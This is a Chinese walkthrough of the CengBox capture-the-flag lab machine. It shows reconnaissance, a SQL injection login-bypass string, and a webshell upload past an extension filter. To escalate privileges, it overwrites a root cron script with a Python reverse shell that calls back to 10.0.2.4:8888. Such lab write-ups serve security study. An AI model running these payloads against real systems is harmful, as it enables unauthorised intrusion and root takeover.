CengBox靶机
创始人
2024-02-06 11:18:01
0

0x01 信息收集

nmap -sV 10.0.2.6

22 ssh端口,弱口令爆破为主

80 web页面 目录遍历,备份文件查找等

dirsearch -u http://10.0.2.6

获取了目录,发现存在一个maseradmin目录,可能存在些东西,继续扫。

dirsearch -u http://10.0.2.6/masteradmin

发现了db.php login.php upload.php 三个页面

0x02 sql注入

我们先看下页面。登陆页面的测试思路主要是sql注入,弱口令 js文件等。这里测试发现了万能密码,也就是说存在sql注入

admin' or'1'='1'#

同时我们也可以用sqlmap跑出数据库。

0x03 文件上传

登录后发现是个上传界面

尝试上传图片或者php,发现都无法上传。发现左上角有个黑色的字体

extension not allowed, please choose a CENG file.

好像只允许上传CENG后缀的文件

上传后发现返回包并不会返回上传路径。

不过前面在信息收集的时候发现了一个uploads/ 目录,尝试访问试试。

发现确实是上传上去了,不过有个告警。测试了下,发现并没什么用,shell文件正常反弹回来了

(因为是apache,所以盲猜是.htaccss文件里面将ceng解析成了php,后来连接后也验证了)

0x04 提权

suid提权

find / -perm -u=s -type f 2>/dev/null

发现并没什么能提权的东西。

计划任务提权

cat /etc/crontab

还是没啥可利用的。

切换目录

尝试去各各目录看看。这里在看的时候,突然想到之前信息收集获取到的db.php文件。赶忙去看下,结果总算有了收获。

获得了数据库的账户密码,但是由于没开3306端口,并没有办法连接。

不过上面我们还通过sql注入获取了一个账户,尝试切换登录试试。

发现登录成功!这里还是老样子,suid提权 任务计划看看,找了半天,并没有什么能提权的思路。

上传脚本检测

python -m SimpleHTTPServer 80	# 本地开一个简单http服务

查看操作系统版本,是64位的

umane -a

上传64位的检测脚本 pspy64

执行该脚本

这个脚本的作用是实时检测系统中运行的进程

chmod +x pspy64
./pspy64

发现一条可用信息,root权限运行md5check,去看看是什么

/opt/md5check.py

发现 user 组用户可读可写,而我们cengover用户刚好属于user组

把这个文件改掉,改为 python 反弹shell 即可

python -c 
'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.4",8888));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

启动监听,等待 md5check 自动运行

成功反弹回shell

相关内容

热门资讯

每周股票复盘:瀚川智能(688... 截至2025年12月26日收盘,瀚川智能(688022)报收于15.3元,较上周的14.42元上涨6...
每周股票复盘:中粮糖业(600... 截至2025年12月26日收盘,中粮糖业(600737)报收于17.27元,较上周的17.18元上涨...
每周股票复盘:马钢股份(600... 截至2025年12月26日收盘,马钢股份(600808)报收于4.22元,较上周的3.82元上涨10...
每周股票复盘:内蒙一机(600... 截至2025年12月26日收盘,内蒙一机(600967)报收于16.34元,较上周的16.05元上涨...
富达基金投顾业务负责人戴旻:封... 由三亚市人民政府主办,《财经》杂志、财经网、《财经智库》、三亚中央商务区管理局、三亚经济研究院承办的...
海南大谷国际园区董事长张焱:以... 由三亚市人民政府主办,《财经》杂志、财经网、《财经智库》、三亚中央商务区管理局、三亚经济研究院承办的...
每周股票复盘:汉马科技(600... 截至2025年12月26日收盘,汉马科技(600375)报收于5.87元,较上周的5.92元下跌0....
每周股票复盘:中天科技(600... 截至2025年12月26日收盘,中天科技(600522)报收于18.4元,较上周的18.37元上涨0...
网约配送员权益维护有了专门法规... 今年厦门市出台《厦门经济特区网约配送员劳动权益保障若干规定》(以下简称《若干规定》),这是厦门市在全...
“十四五”的大冶答卷:政策赋能... 从商业综合体崛起到乡村直播间走红,从政策红利直达市场主体到“大冶制造”扬帆出海……“十四五”期间,大...